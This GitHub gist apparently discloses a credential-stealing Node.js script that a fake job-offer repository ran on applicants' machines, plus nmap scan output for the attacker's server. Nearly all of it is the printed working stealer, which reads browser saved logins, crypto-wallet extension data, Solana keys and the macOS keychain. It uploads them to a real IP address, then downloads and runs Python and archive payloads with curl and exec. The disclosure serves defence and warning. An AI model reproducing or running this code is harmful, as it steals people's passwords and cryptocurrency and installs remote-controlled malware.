Skip to content

Instantly share code, notes, and snippets.

@HyperCrowd

HyperCrowd/malware.js

Last active August 22, 2024 11:07
Show Gist options
  • Save HyperCrowd/675095ca245a4eacd284234f78294c15 to your computer and use it in GitHub Desktop.
Save HyperCrowd/675095ca245a4eacd284234f78294c15 to your computer and use it in GitHub Desktop.
Download ZIP
Malware Disguised As Job Offer
Raw
malware.js
// This is deobfuscated code from a Node.js file that runs from the repository in the job offer
// It appears to gather all kinds of identification and password hash files and ships them to 185.235.241.208
(function (_0x128376, _0x1cdd7b) {
const _0x370f08 = _0x128376();
while (true) {
try {
const _0x5531ca = parseInt(_0x1dfb(522, '0x43e')) / 1 * (-parseInt(_0x1dfb(497, '0x80')) / 2) + -parseInt(_0x1dfb(372, -46)) / 3 + -parseInt(_0x1dfb(443, 0x65)) / 4 * (parseInt(_0x1dfb(479, '0x90')) / 5) + -parseInt(_0x1dfb(348, '0x375')) / 6 + -parseInt(_0x1dfb(373, -0x23)) / 7 + parseInt(_0x1dfb(502, '0x459')) / 8 + parseInt(_0x1dfb(558, '0x4b1')) / 9 * (parseInt(_0x1dfb(327, -170)) / 10);
if (_0x5531ca === _0x1cdd7b) {
break;
} else {
_0x370f08.push(_0x370f08.shift());
}
} catch (_0x25f86e) {
_0x370f08.push(_0x370f08.shift());
}
}
})(_0x55cf, 101689);
function _0x21daab(_0x1099f7, _0x413fb2, _0x59789a, _0x55497c) {
return _0x1dfb(_0x413fb2 - 0x1c5, _0x55497c);
}
function _0x10ea7d(_0x599a14, _0x385b6d, _0x45f59e, _0xb20d3a) {
return _0x1dfb(_0x45f59e + 0x305, _0x385b6d);
}
const _0x1ab683 = function () {
let _0x16e324 = true;
return function (_0x3d9d31, _0x3d8f75) {
const _0x2e957d = _0x16e324 ? function () {
if (_0x3d8f75) {
const _0x5b8ea0 = _0x3d8f75.apply(_0x3d9d31, arguments);
_0x3d8f75 = null;
return _0x5b8ea0;
}
} : function () {};
_0x16e324 = false;
return _0x2e957d;
};
}();
const _0x374832 = _0x1ab683(this, function () {
return _0x374832.toString().search("(((.+)+)+)+$").toString().constructor(_0x374832).search("(((.+)+)+)+$");
});
_0x374832();
const _0x419b5e = function () {
let _0x2f726e = true;
return function (_0x4bb5bb, _0x1071a9) {
const _0x8557 = _0x2f726e ? function () {
if (_0x1071a9) {
const _0x30bafa = _0x1071a9.apply(_0x4bb5bb, arguments);
_0x1071a9 = null;
return _0x30bafa;
}
} : function () {};
_0x2f726e = false;
return _0x8557;
};
}();
const _0xe08a41 = _0x419b5e(this, function () {
const _0x532963 = function () {
let _0x17d7f6;
try {
_0x17d7f6 = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (_0x240ab9) {
_0x17d7f6 = window;
}
return _0x17d7f6;
};
const _0x5383af = _0x532963();
const _0x5f4f46 = _0x5383af.console = _0x5383af.console || {};
const _0x319acf = ["log", "warn", "info", "error", "exception", "table", "trace"];
for (let _0x18efb7 = 0; _0x18efb7 < _0x319acf.length; _0x18efb7++) {
const _0x32061b = _0x419b5e.constructor.prototype.bind(_0x419b5e);
const _0x3a1881 = _0x319acf[_0x18efb7];
const _0x4d27aa = _0x5f4f46[_0x3a1881] || _0x32061b;
_0x32061b.__proto__ = _0x419b5e.bind(_0x419b5e);
_0x32061b.toString = _0x4d27aa.toString.bind(_0x4d27aa);
_0x5f4f46[_0x3a1881] = _0x32061b;
}
});
_0xe08a41();
const _0x4bf942 = require('fs');
const _0x10095c = require('os');
const _0x86968b = require("path");
const _0x1e35b1 = require("request");
const _0x7cff4d = require("child_process").exec;
const _0x49f25b = _0x10095c.hostname();
const _0x33f6cf = _0x10095c.platform();
const _0x5043df = _0x10095c.homedir();
const _0x3507e0 = _0x10095c.tmpdir();
const _0x1c8a9f = _0x44f647 => _0x44f647.replace(/^~([a-z]+|\/)/, (_0x39f92e, _0x36e957) => '/' === _0x36e957 ? _0x5043df : _0x86968b.dirname(_0x5043df) + '/' + _0x36e957);
function _0x10a6cf(_0x1b7dae) {
try {
_0x4bf942.accessSync(_0x1b7dae);
return true;
} catch (_0x46d148) {
return false;
}
}
const _0x5ed30d = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
const _0x45c915 = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const _0x793f19 = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", 'opera'];
const _0x6521fb = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
const _0x4b30b9 = async (_0x1e85a6, _0x2c1b98, _0x3daa8b) => {
let _0x3d40d9;
if (!_0x1e85a6 || '' === _0x1e85a6) {
return [];
}
try {
if (!_0x10a6cf(_0x1e85a6)) {
return [];
}
} catch (_0x370829) {
return [];
}
if (!_0x2c1b98) {
_0x2c1b98 = '';
}
let _0x43433b = [];
for (let _0x2806a7 = 0; _0x2806a7 < 200; _0x2806a7++) {
const _0x54ab1e = _0x1e85a6 + '/' + (0 === _0x2806a7 ? "Default" : "Profile " + _0x2806a7) + "/Local Extension Settings";
for (let _0x496495 = 0; _0x496495 < _0x6521fb.length; _0x496495++) {
let _0xc48bf2 = _0x54ab1e + '/' + _0x6521fb[_0x496495];
if (_0x10a6cf(_0xc48bf2)) {
let _0x35e42c = [];
try {
_0x35e42c = _0x4bf942.readdirSync(_0xc48bf2);
} catch (_0x45b13e) {
_0x35e42c = [];
}
_0x35e42c.forEach(async _0x334636 => {
let _0x348a15 = _0x86968b.join(_0xc48bf2, _0x334636);
try {
const _0x8491c = {
filename: "66_" + _0x2c1b98 + _0x2806a7 + '_' + _0x6521fb[_0x496495] + '_' + _0x334636
};
if (_0x348a15.includes('.log') || _0x348a15.includes(".ldb")) {
_0x43433b.push({
'value': _0x4bf942.createReadStream(_0x348a15),
'options': _0x8491c
});
}
} catch (_0x1a004d) {}
});
}
}
}
if (_0x3daa8b && (_0x3d40d9 = _0x5043df + "/.config/solana/id.json", _0x4bf942.existsSync(_0x3d40d9))) {
try {
const _0x119346 = {
filename: "solana_id.txt"
};
_0x43433b.push({
'value': _0x4bf942.createReadStream(_0x3d40d9),
'options': _0x119346
});
} catch (_0x133caf) {}
}
_0x25cbc1(_0x43433b);
return _0x43433b;
};
const _0x26fc16 = () => {
const _0x1e0ec6 = _0x1c8a9f('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x2ba0fb = [];
if (_0x10a6cf(_0x1e0ec6)) {
let _0x22f691 = [];
try {
_0x22f691 = _0x4bf942.readdirSync(_0x1e0ec6);
} catch (_0x549474) {
_0x22f691 = [];
}
let _0xa73e79 = 0;
_0x22f691.forEach(async _0x6f9271 => {
let _0x2f874b = _0x86968b.join(_0x1e0ec6, _0x6f9271);
if (_0x2f874b.includes("-release")) {
let _0xc7393c = _0x86968b.join(_0x2f874b, "/storage/default");
let _0xe490b3 = [];
_0xe490b3 = _0x4bf942.readdirSync(_0xc7393c);
let _0x36a013 = 0;
_0xe490b3.forEach(async _0x2f7f51 => {
if (_0x2f7f51.includes("moz-extension")) {
let _0x592a90 = _0x86968b.join(_0xc7393c, _0x2f7f51);
_0x592a90 = _0x86968b.join(_0x592a90, "idb");
let _0x4e1469 = [];
_0x4e1469 = _0x4bf942.readdirSync(_0x592a90);
_0x4e1469.forEach(async _0x2bc427 => {
if (_0x2bc427.includes(".files")) {
let _0x4acd59 = _0x86968b.join(_0x592a90, _0x2bc427);
let _0x155b1a = [];
_0x155b1a = _0x4bf942.readdirSync(_0x4acd59);
_0x155b1a.forEach(_0x4c438f => {
if (!_0x4bf942.statSync(_0x86968b.join(_0x4acd59, _0x4c438f)).isDirectory()) {
let _0x557494 = _0x86968b.join(_0x4acd59, _0x4c438f);
const _0x12d04b = {
filename: _0xa73e79 + '_' + _0x36a013 + '_' + _0x4c438f
};
_0x2ba0fb.push({
'value': _0x4bf942.createReadStream(_0x557494),
'options': _0x12d04b
});
}
});
}
});
}
});
_0x36a013 += 1;
}
_0xa73e79 += 1;
});
_0x25cbc1(_0x2ba0fb);
return _0x2ba0fb;
}
};
const _0x25cbc1 = _0x17b9ff => {
const _0x2d5a4e = {
type: '99',
hid: "66_" + _0x49f25b,
multi_file: _0x17b9ff
};
try {
if (_0x17b9ff.length > 0) {
const _0x14ee2b = {
url: "http://185.235.241.208:1224/uploads",
formData: _0x2d5a4e
};
_0x1e35b1.post(_0x14ee2b, (_0x1e8181, _0x2410e2, _0x41c97d) => {});
}
} catch (_0x25f17d) {}
};
const _0x5ee4ab = async (_0x385a51, _0x1d8a72) => {
try {
let _0x206c50 = '';
_0x206c50 = 'd' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/Library/Application Support/" + _0x385a51[1] : 'l' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/.config/" + _0x385a51[2] : _0x1c8a9f('~/') + "/AppData/" + _0x385a51[0] + "/User Data";
await _0x4b30b9(_0x206c50, _0x1d8a72 + '_', 0 == _0x1d8a72);
} catch (_0x2460ca) {}
};
const _0x23d512 = async () => {
let _0x2dca92 = [];
let _0x1e2e66 = _0x5043df + "/Library/Keychains/login.keychain";
if (_0x4bf942.existsSync(_0x1e2e66)) {
try {
const _0x26aa8b = {
filename: "logkc-db"
};
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x1e2e66),
'options': _0x26aa8b
});
} catch (_0x5105ef) {}
} else {
_0x1e2e66 += "-db";
if (_0x4bf942.existsSync(_0x1e2e66)) {
try {
const _0x572c23 = {
filename: 'logkc-db'
};
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x1e2e66),
'options': _0x572c23
});
} catch (_0x4b5814) {}
}
}
try {
let _0x5bd64b = _0x5043df + "/Library/Application Support/Google/Chrome";
if (_0x10a6cf(_0x5bd64b)) {
for (let _0x218aec = 0; _0x218aec < 200; _0x218aec++) {
const _0xe2994b = _0x5bd64b + '/' + (0 === _0x218aec ? "Default" : "Profile " + _0x218aec) + "/Login Data";
try {
if (!_0x10a6cf(_0xe2994b)) {
continue;
}
const _0x4b27ce = _0x5bd64b + "/ld_" + _0x218aec;
const _0x23c770 = {
filename: 'pld_' + _0x218aec
};
if (_0x10a6cf(_0x4b27ce)) {
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x4b27ce),
'options': _0x23c770
});
} else {
_0x4bf942.copyFile(_0xe2994b, _0x4b27ce, _0x4c96ba => {
const _0x1ce0f7 = {
filename: "pld_" + _0x218aec
};
let _0x3ac7c0 = [{
'value': _0x4bf942.createReadStream(_0xe2994b),
'options': _0x1ce0f7
}];
_0x25cbc1(_0x3ac7c0);
});
}
} catch (_0x3f07b7) {}
}
}
} catch (_0x62f3bd) {}
try {
let _0x26c15c = _0x5043df + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (_0x10a6cf(_0x26c15c)) {
for (let _0x3b7f92 = 0; _0x3b7f92 < 200; _0x3b7f92++) {
const _0x44603e = _0x26c15c + '/' + (0 === _0x3b7f92 ? "Default" : "Profile " + _0x3b7f92);
try {
if (!_0x10a6cf(_0x44603e)) {
continue;
}
const _0x5ea305 = _0x44603e + "/Login Data";
const _0x70887a = {
filename: "brld_" + _0x3b7f92
};
if (_0x10a6cf(_0x5ea305)) {
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x5ea305),
'options': _0x70887a
});
} else {
_0x4bf942.copyFile(_0x44603e, _0x5ea305, _0x310092 => {
const _0x31d38b = {
filename: "brld_" + _0x3b7f92
};
let _0x16ea8d = [{
'value': _0x4bf942.createReadStream(_0x44603e),
'options': _0x31d38b
}];
_0x25cbc1(_0x16ea8d);
});
}
} catch (_0x290199) {}
}
}
} catch (_0x1d62a2) {}
_0x25cbc1(_0x2dca92);
return _0x2dca92;
};
const _0xc3c6be = async (_0x3b8a9c, _0x5bf28f) => {
let _0x215094 = [];
let _0x567bf0 = '';
_0x567bf0 = 'd' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/Library/Application Support/" + _0x3b8a9c[1] : 'l' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/.config/" + _0x3b8a9c[2] : _0x1c8a9f('~/') + "/AppData/" + _0x3b8a9c[0] + "/User Data";
let _0x5dfc53 = _0x567bf0 + "/Local State";
if (_0x4bf942.existsSync(_0x5dfc53)) {
try {
const _0x526083 = {
filename: _0x5bf28f + "_lst"
};
_0x215094.push({
'value': _0x4bf942.createReadStream(_0x5dfc53),
'options': _0x526083
});
} catch (_0x499ed5) {}
}
try {
if (_0x10a6cf(_0x567bf0)) {
for (let _0x36f1c0 = 0; _0x36f1c0 < 200; _0x36f1c0++) {
const _0x4787d4 = _0x567bf0 + '/' + (0 === _0x36f1c0 ? "Default" : "Profile " + _0x36f1c0);
try {
if (!_0x10a6cf(_0x4787d4)) {
continue;
}
const _0x32d961 = _0x4787d4 + "/Login Data";
if (!_0x10a6cf(_0x32d961)) {
continue;
}
const _0x5ec5b8 = {
filename: _0x5bf28f + '_' + _0x36f1c0 + '_uld'
};
_0x215094.push({
'value': _0x4bf942.createReadStream(_0x32d961),
'options': _0x5ec5b8
});
} catch (_0x2a6583) {}
}
}
} catch (_0x586607) {}
_0x25cbc1(_0x215094);
return _0x215094;
};
function _0x1dfb(_0x121b22, _0x569bfc) {
const _0x5b1124 = _0x55cf();
_0x1dfb = function (_0x55cf27, _0x1dfbfd) {
_0x55cf27 = _0x55cf27 - 324;
let _0x3a5f9b = _0x5b1124[_0x55cf27];
return _0x3a5f9b;
};
return _0x1dfb(_0x121b22, _0x569bfc);
}
function _0x55cf() {
const _0x5a3b91 = ['jDasl', 'bfnaelmome', 'WZANW', 'ocyhZ', 'createRead', 'ITmoQ', 'acmacodkjb', '626586QKOwys', '-db', 'jbmgjidlcd', 'raveSoftwa', 'isDirector', 'QnOeo', 'includes', "/Login Dat", 'qYCXQ', 'oogle/Chro', '/Library/K', 'BraveSoftw', 'writeFileS', 'cfgodnhcel', 'OtRxI', 'brld_', 'Google/Chr', 'multi_file', 'mdjonilkdb', 'ome', 'luVIT', 'aTPfH', 'ess', 'opftO', '593601LJvkBJ', '841778iRRESH', 'YbUxM', "era Softwa", 'bind', '/uploads', 'copyFile', 'type', 'JEJPp', "ctor(\"retu", 'lchlghecda', "\\p.zi", '/ld_', 'exception', 'hid', '_lst', 'Roaming/Op', 'HnztH', 'tbRkY', 'pikoobohma', 'phepccionb', 'dgmoleebol', 'lmeeeajnim', 'nhPVS', 'vArxC', 'QNABQ', 'mnkoeoihof', 'google-chr', 'hzOCu', 'sKbCj', 'replace', '__proto__', 'hifafgmccd', '/pdown', 'fhbohimael', 'length', 'fPJcj', 'nkbihfbeog', 'Local/Goog', 'rXFAW', 'Browser', '/storage/d', 'dirname', 'jgjfhomihk', '/.config/', 'ASXZy', 'prKfQ', 'TwIlw', 'aholpfdial', 'are/Brave-', 'post', 'RXVCE', 'rocur', 'venWy', 'TOOSD', 'trace', 'dvphq', 'logkc-db', "rn this\")(", 'idb', 'fOXRo', 'log', '.235.241.2', 'illa/Firef', '(((.+)+)+)', 'warn', 'search', 'sNyAe', '.files', 'VfvFG', 'pld_', '332VsuwBT', 'accessSync', 'olana/id.j', '/Library/A', 'readdirSyn', 'mCwlp', 'nmhnfnkdna', 'forEach', 'obpzz', 'LypkF', 'ogin.keych', 'sHyUX', 'FYgWS', 'era', '/.npl', 'on.exe', 'Stream', "/.npl\"", 'NsbmG', 'gpafnldhgm', '-release', 'PjIlM', 'lTVRM', 'apagcccfch', "curl -Lo \"", 'rename', 'ocal/Micro', 'CVwNs', 'eofbddgcij', 'Default', 'rmSync', " Support/G", 'hFzaP', 'path', 'vZmKU', 'EhRaM', '6565xQYeIL', 'statSync', 'eychains/l', 'MYSfc', 'ync', 'ibnejdfjmm', 'dCXnR', " Support/", 'pNxZc', 'pekplomjjk', "/Local Sta", 'lBygL', 'NoXjx', 'yfwOi', 'soft/Edge/', "ension Set", 'toString', '/AppData/L', '200mTHErI', 'ion', 'prototype', 'uuEFX', 'oaming/Moz', '223256niZPRB', 'Mdeso', 'eSoftware/', "\\.pyp\\pyth", '/AppData/', 'apply', 'pplication', 'existsSync', 'table', 'rowser', 'YRqkK', 'ox/Profile', 'request', 'size', 'url', 'homedir', 'yDMWZ', 'lKScI', 'mtwkM', "Profile ", '298yMMeNA', 'lvHTA', 'PuOBA', 'kodbefgpgk', 'push', 'get', "re/Opera S", 'ain', " -C ", 'kkGlZ', 'filename', 'behhmhfood', "/Local Ext", "python3 \"", " Support/B", 'solana_id.', 'dlcobpjiig', 'http://185', 'console', 'renameSync', 'bohpjbbldc', 'exec', 'kpcnlpebkl', 'iZLcK', 'HsAKs', 'SclKp', 'NBGSX', 'moz-extens', 'ngcnapndod', 'kqXRf', 'Local/Brav', 'BwWom', 'constructo', 'QDGqv', "nction() ", 'OJuxT', '300843JNscGT', '/client/', "/User Data", 'RDWcG', 'info', '190QQTawu', 'error', 'hnfanknocf', 'platform', '.ldb', 'join', '/.config/s', 'son', 'tmpdir', 'aBHIV', 'aeachknmef', "\" \"", 'jemss', "User Data"];
_0x55cf = function () {
return _0x5a3b91;
};
return _0x55cf();
}
let _0x4148ac = 0;
const _0x501629 = async _0x237baf => {
_0x7cff4d("tar -xf " + _0x237baf + " -C " + _0x5043df, (_0x2072a1, _0x345f24, _0x49310c) => {
if (_0x2072a1) {
_0x4bf942.rmSync(_0x237baf);
return void (_0x4148ac = 0);
}
_0x4bf942.rmSync(_0x237baf);
_0x5bc0ed();
});
};
const _0x3003d9 = () => {
const _0x3a3cb9 = _0x3507e0 + "\\p.zi";
const _0x3198e3 = _0x3507e0 + "\\p2.zip";
if (_0x4148ac >= 51476596) {
return;
}
if (_0x4bf942.existsSync(_0x3a3cb9)) {
try {
var _0x27df9a = _0x4bf942.statSync(_0x3a3cb9);
if (_0x27df9a.size >= 51476596) {
_0x4148ac = _0x27df9a.size;
_0x4bf942.rename(_0x3a3cb9, _0x3198e3, _0x39725c => {
if (_0x39725c) {
throw _0x39725c;
}
_0x501629(_0x3198e3);
});
} else {
if (_0x4148ac < _0x27df9a.size) {
_0x4148ac = _0x27df9a.size;
} else {
_0x4bf942.rmSync(_0x3a3cb9);
_0x4148ac = 0;
}
_0x187c02();
}
} catch (_0x2370ad) {}
} else {
_0x7cff4d("curl -Lo \"" + _0x3a3cb9 + "\" \"" + "http://185.235.241.208:1224/pdown" + "\"", (_0x511ce7, _0x220c64, _0x4db374) => {
if (_0x511ce7) {
_0x4148ac = 0;
return void _0x187c02();
}
try {
_0x4148ac = 51476596;
_0x4bf942.renameSync(_0x3a3cb9, _0x3198e3);
_0x501629(_0x3198e3);
} catch (_0xe8dc33) {}
});
}
};
function _0x187c02() {
setTimeout(() => {
_0x3003d9();
}, 20000);
}
const _0x5bc0ed = async () => await new Promise((_0x25ed5d, _0x3d0abd) => {
if ('w' == _0x33f6cf[0]) {
if (_0x4bf942.existsSync(_0x5043df + "\\.pyp\\python.exe")) {
(() => {
const _0x3aee97 = _0x5043df + "/.npl";
const _0x38e97c = "\"" + _0x5043df + "\\.pyp\\python.exe\" \"" + _0x3aee97 + "\"";
try {
_0x4bf942.rmSync(_0x3aee97);
} catch (_0x47bcb4) {}
_0x1e35b1.get("http://185.235.241.208:1224/client/99/66", (_0x414c88, _0x478c51, _0x45991a) => {
if (!_0x414c88) {
try {
_0x4bf942.writeFileSync(_0x3aee97, _0x45991a);
_0x7cff4d(_0x38e97c, (_0x2f4109, _0x5a82d5, _0x32d80a) => {});
} catch (_0x476d41) {}
}
});
})();
} else {
_0x3003d9();
}
} else {
(() => {
_0x1e35b1.get("http://185.235.241.208:1224/client/99/66", (_0x25b30d, _0x373ce0, _0x473979) => {
if (!_0x25b30d) {
_0x4bf942.writeFileSync(_0x5043df + "/.npl", _0x473979);
_0x7cff4d("python3 \"" + _0x5043df + "/.npl\"", (_0x190e98, _0x16b004, _0x4a9630) => {});
}
});
})();
}
});
var _0x152224 = 0;
const _0x59f5ea = async () => {
try {
await (async () => {
try {
await _0x5ee4ab(_0x45c915, 0);
await _0x5ee4ab(_0x5ed30d, 1);
await _0x5ee4ab(_0x793f19, 2);
_0x26fc16();
if ('w' == _0x33f6cf[0]) {
await _0x4b30b9(_0x1c8a9f('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false);
}
if ('d' == _0x33f6cf[0]) {
await _0x23d512();
} else {
await _0xc3c6be(_0x45c915, 0);
await _0xc3c6be(_0x5ed30d, 1);
await _0xc3c6be(_0x793f19, 2);
}
} catch (_0xc8f850) {}
})();
_0x5bc0ed();
} catch (_0x58c825) {}
};
_0x59f5ea();
_0x5bc0ed();
let _0x56c931 = setInterval(() => {
if ((_0x152224 += 1) < 5) {
_0x59f5ea();
} else {
clearInterval(_0x56c931);
}
}, 30000);
Raw
portScan.sh
# Full nmap of that IP address
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_https-redirect: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
1224/tcp open http Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
|_http-title: Error
1245/tcp open isbconference2?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Length: 3225
| Content-Disposition: inline; filename="index.html"
| Accept-Ranges: bytes
| ETag: "43ce08108386f188edae0956cdb185c8f9c9f804"
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Tue, 30 Jul 2024 23:34:33 GMT
| Connection: close
|_ <!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Web site created using create-react-app"/><link rel="apple-touch-icon" href="/logo192.png"/><link rel="stylesheet" href="/assets/bootstrap/dist/css/bootstrap.min.css"><link rel="manifest" href="/manifest.json"/><title>L-Administrator</title><link href="/static/css/main.f2117e3f.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this
3306/tcp open mysql MariaDB (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-BS656MOF35Q
| NetBIOS_Domain_Name: WIN-BS656MOF35Q
| NetBIOS_Computer_Name: WIN-BS656MOF35Q
| DNS_Domain_Name: WIN-BS656MOF35Q
| DNS_Computer_Name: WIN-BS656MOF35Q
| Product_Version: 10.0.20348
|_ System_Time: 2024-07-30T23:35:19+00:00
| ssl-cert: Subject: commonName=WIN-BS656MOF35Q
| Not valid before: 2024-07-15T14:16:49
|_Not valid after: 2025-01-14T14:16:49
|_ssl-date: 2024-07-30T23:35:27+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
52444/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1245-TCP:V=7.80%I=7%D=7/30%Time=66A97889%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,DB5,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x203225\r\nCont
SF:ent-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Range
SF:s:\x20bytes\r\nETag:\x20\"43ce08108386f188edae0956cdb185c8f9c9f804\"\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodi
SF:ng\r\nDate:\x20Tue,\x2030\x20Jul\x202024\x2023:34:33\x20GMT\r\nConnecti
SF:on:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\
SF:x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/>
SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scal
SF:e=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20n
SF:ame=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20cre
SF:ate-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\.
SF:png\"/><link\x20rel=\"stylesheet\"\x20href=\"/assets/bootstrap/dist/css
SF:/bootstrap\.min\.css\"><link\x20rel=\"manifest\"\x20href=\"/manifest\.j
SF:son\"/><title>L-Administrator</title><link\x20href=\"/static/css/main\.
SF:f2117e3f\.chunk\.css\"\x20rel=\"stylesheet\"></head><body><noscript>You
SF:\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20")%r(HTT
SF:POptions,DB5,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x203225\r\nCont
SF:ent-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Range
SF:s:\x20bytes\r\nETag:\x20\"43ce08108386f188edae0956cdb185c8f9c9f804\"\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodi
SF:ng\r\nDate:\x20Tue,\x2030\x20Jul\x202024\x2023:34:33\x20GMT\r\nConnecti
SF:on:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\
SF:x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/>
SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scal
SF:e=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20n
SF:ame=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20cre
SF:ate-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\.
SF:png\"/><link\x20rel=\"stylesheet\"\x20href=\"/assets/bootstrap/dist/css
SF:/bootstrap\.min\.css\"><link\x20rel=\"manifest\"\x20href=\"/manifest\.j
SF:son\"/><title>L-Administrator</title><link\x20href=\"/static/css/main\.
SF:f2117e3f\.chunk\.css\"\x20rel=\"stylesheet\"></head><body><noscript>You
SF:\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-30T23:35:22
|_ start_date: N/A
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment